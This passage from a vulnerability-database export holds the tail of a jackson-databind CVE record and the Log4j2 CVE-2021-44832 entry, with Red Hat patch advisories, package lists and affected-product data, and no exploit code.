"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3461"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3642"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3637"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3638"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163174"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163174",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158884",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159083",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-10672",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-18T00:00:00",
"db": "VULHUB",
"id": "VHN-163174",
"ident": null
},
{
"date": "2020-07-29T17:52:58",
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-08-17T17:34:41",
"db": "PACKETSTORM",
"id": "158884",
"ident": null
},
{
"date": "2020-09-07T16:39:48",
"db": "PACKETSTORM",
"id": "159083",
"ident": null
},
{
"date": "2020-09-07T16:38:23",
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"date": "2020-09-07T16:37:51",
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"date": "2020-09-07T16:39:28",
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"date": "2020-03-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1150",
"ident": null
},
{
"date": "2020-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003144",
"ident": null
},
{
"date": "2020-03-18T22:15:12.313000",
"db": "NVD",
"id": "CVE-2020-10672",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-163174",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1150",
"ident": null
},
{
"date": "2020-04-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003144",
"ident": null
},
{
"date": "2024-11-21T04:55:49.050000",
"db": "NVD",
"id": "CVE-2020-10672",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
}
],
"trust": 1.1
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
}
],
"trust": 0.6
}
}
VAR-202112-2011
Vulnerability from variot - Updated: 2026-03-09 21:17Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. Apache Log4j is a Java-based open source logging tool of the Apache Foundation. Apache Log4j2 2.0-beta7 to 2.17.0 versions have a security vulnerability, which stems from the lack of effective protection and filtering for JDBC Appender and JNDI in the software.
The References section of this erratum contains a download link (you must log in to download the update). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update Advisory ID: RHSA-2022:1297-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2022:1297 Issue date: 2022-04-11 CVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046 CVE-2021-45105 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 =====================================================================
- Summary:
A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.4 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender (CVE-2022-23305)
-
log4j: Unsafe deserialization flaw in Chainsaw log viewer (CVE-2022-23307)
-
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
-
log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
-
log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
-
log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)
-
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink (CVE-2022-23302)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender 2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) 2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender 2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink 2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender 2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7 JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1 JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034 JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17) JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console JBEAP-22839 - GSS Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001 JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001 JBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8 JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002 JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001 JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001 JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001 JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001 JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002 JBEAP-23038 - (7.4.z) Upgrade galleon-plugins from 5.1.4.Final to 5.2.6.Final JBEAP-23040 - (7.4.z) Upgrade galleon-plugins in wildfly-core-eap from 5.1.4.Final to 5.2.6.Final JBEAP-23045 - (7.4.z) Upgrade Undertow from 2.2.13.SP2-redhat-00001 to 2.2.16.Final-redhat-0001 JBEAP-23101 - (7.4.z) Upgrade Infinispan from 11.0.12.Final to 11.0.15.Final JBEAP-23105 - (7.4.z) Upgrade Narayana from 5.11.3.Final-redhat-00001 to 5.11.4.Final-redhat-00001 JBEAP-23143 - (7.4.z) Upgrade from org.eclipse.jdt.core.compiler:ecj:4.6.1 to org.eclipse.jdt:ecj:3.26 JBEAP-23177 - (7.4.z) Upgrade XNIO from 3.8.5.SP1-redhat-00001 to 3.8.6.Final-redhat-00001 JBEAP-23323 - GSS WFLY-16112 - Batch JobOperatorService should look for only active job names to stop during suspend JBEAP-23373 - (7.4.z) Upgrade OpenSSL from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002 JBEAP-23374 - (7.4.z) Upgrade WildFly Core from 15.0.7.Final-redhat-00001 to 15.0.8.Final-redhat-00001 JBEAP-23375 - (7.4.z) Upgrade OpenSSL Natives from 2.2.0.Final-redhat-00001 to 2.2.0.Final-redhat-00002
- Package List:
Red Hat JBoss EAP 7.4 for RHEL 8:
Source: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.src.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.src.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.src.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.src.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.src.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.src.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.src.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.src.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.src.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.src.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.src.rpm eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.src.rpm eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.src.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.src.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.src.rpm
noarch: eap7-activemq-artemis-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-cli-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-commons-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-core-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-dto-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hornetq-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-hqclient-protocol-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jdbc-store-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-client-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-jms-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-journal-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-ra-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-selector-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-server-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-service-extensions-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-activemq-artemis-tools-2.16.0-7.redhat_00034.1.el8eap.noarch.rpm eap7-ecj-3.26.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-hal-console-3.3.9-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-hibernate-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-core-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-entitymanager-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-envers-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-hibernate-java8-5.3.25-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-infinispan-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-jdbc-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-cachestore-remote-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-client-hotrod-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-component-annotations-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-core-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-11.0.15-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-server-migration-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-cli-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-server-migration-core-1.10.0-15.Final_redhat_00014.1.el8eap.noarch.rpm eap7-jboss-vfs-3.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jboss-xnio-base-3.8.6-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-jbossws-cxf-5.4.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-log4j-2.17.1-1.redhat_00001.1.el8eap.noarch.rpm eap7-narayana-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-compensations-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbosstxbridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jbossxts-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-idlj-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-jts-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-api-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-bridge-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-integration-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-restat-util-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-narayana-txframework-5.11.4-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-objectweb-asm-9.1.0-1.redhat_00002.1.el8eap.noarch.rpm eap7-undertow-2.2.16-1.Final_redhat_00001.1.el8eap.noarch.rpm eap7-wildfly-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-elytron-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-elytron-tool-1.15.11-1.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-javadocs-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-modules-7.4.4-3.GA_redhat_00011.1.el8eap.noarch.rpm eap7-wildfly-openssl-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-wildfly-openssl-java-2.2.0-3.Final_redhat_00002.1.el8eap.noarch.rpm eap7-xom-1.3.7-1.redhat_00001.1.el8eap.noarch.rpm eap7-yasson-1.0.10-1.redhat_00001.1.el8eap.noarch.rpm
x86_64: eap7-wildfly-openssl-el8-x86_64-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm eap7-wildfly-openssl-el8-x86_64-debuginfo-2.2.0-2.Final_redhat_00002.1.el8eap.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-4104 https://access.redhat.com/security/cve/CVE-2021-44832 https://access.redhat.com/security/cve/CVE-2021-45046 https://access.redhat.com/security/cve/CVE-2021-45105 https://access.redhat.com/security/cve/CVE-2022-23302 https://access.redhat.com/security/cve/CVE-2022-23305 https://access.redhat.com/security/cve/CVE-2022-23307 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYlRUqtzjgjWX9erEAQhXfxAApQ6HkBUo8Tg+GWEosSpAx0AEsVPMojWK HU3uJRF8jp0KXqchc+KVlalBJAWHPBUDr4xBpsISqwr7T/9iYonKlo4ijA/68b2K khbFyt6o6i2dXrYygT5fcMtukSjN2T/hfCc2ZE2yiHTO3Ou4AALyZ2xCyYtfSpuZ rZLVvgCWrnak2msgkoNl0/sZxnjw6b+ZJczKkq3QqPVWOYlV/Qdl5NGy16i0rbEo P1rWXJrOUlEBctJEs756cqeIJesYKHZqqPx/kHaNyzdxDh99hKGZx7oturscAN6e sPfSSdyd5jsOcWD7UlHV9ukoPQxf1ouVBa0qkpL0wCoR3GFF6Pls1bMEFzUoz3/R IwagVxsr38duK3isv34l6IQ+RP0oSWN0rgPUu69tAlEV+YwLgA5JUOpz1i7FTmXt l3i5+wMlo9Xc/Hy+j7unW8Do7s/i0YuFVTuM6H9KEITuFjgFA2tB9CpzoAFzWLk0 U8zCL80Rwy1wiMydSrLjtg3YUPB6ibh2NJ02O7R+bNhJ8bN4yuDuWkDqy4VdPXGp zhed3dZmYAXD9/x+mnfghcbJZwigzGT9Qv78zYafB3f8K7cEVEDJK3aZMOkkh9ca dcaLs5WRv8ZTytFPv+KGKRJ/cc/UHAvh8zumMZdVMp1oty/k/OYWhgaEJMWGQDCe UnHI/WwB37w= =eCh2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:
For OpenShift Container Platform 3.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/3.11/upgrading/index.html
- Bugs fixed (https://bugzilla.redhat.com/):
2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2089 - resourceVersion is overflowing type Integer causing ES rejection [openshift-logging 5.0]
- Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
Security Fix(es):
-
jetty: crafted URIs allow bypassing security constraints (CVE-2021-34429)
-
netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
-
netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
-
Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients (CVE-2021-38153)
-
log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1985223 - CVE-2021-34429 jetty: crafted URIs allow bypassing security constraints 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients 2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.3.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "cloudcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.10.0.16"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "communications offline mediation controller",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.4.4"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.24"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.0.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.11"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.0.1"
},
{
"_id": null,
"model": "retail fiscal management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.2"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0.4"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.4"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.17.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "communications brm - elastic charging engine",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0.5.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.18.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12"
},
{
"_id": null,
"model": "health sciences data management workbench",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.1.0.3"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "product lifecycle analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.6.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.24"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "flexcube private banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.12"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.4"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.1"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.13"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0.3"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.13.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12.12.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.12.0.0"
},
{
"_id": null,
"model": "retail assortment planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "health sciences data management workbench",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.0.0.0"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "health sciences data management workbench",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.5.2.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0.2"
},
{
"_id": null,
"model": "communications brm - elastic charging engine",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
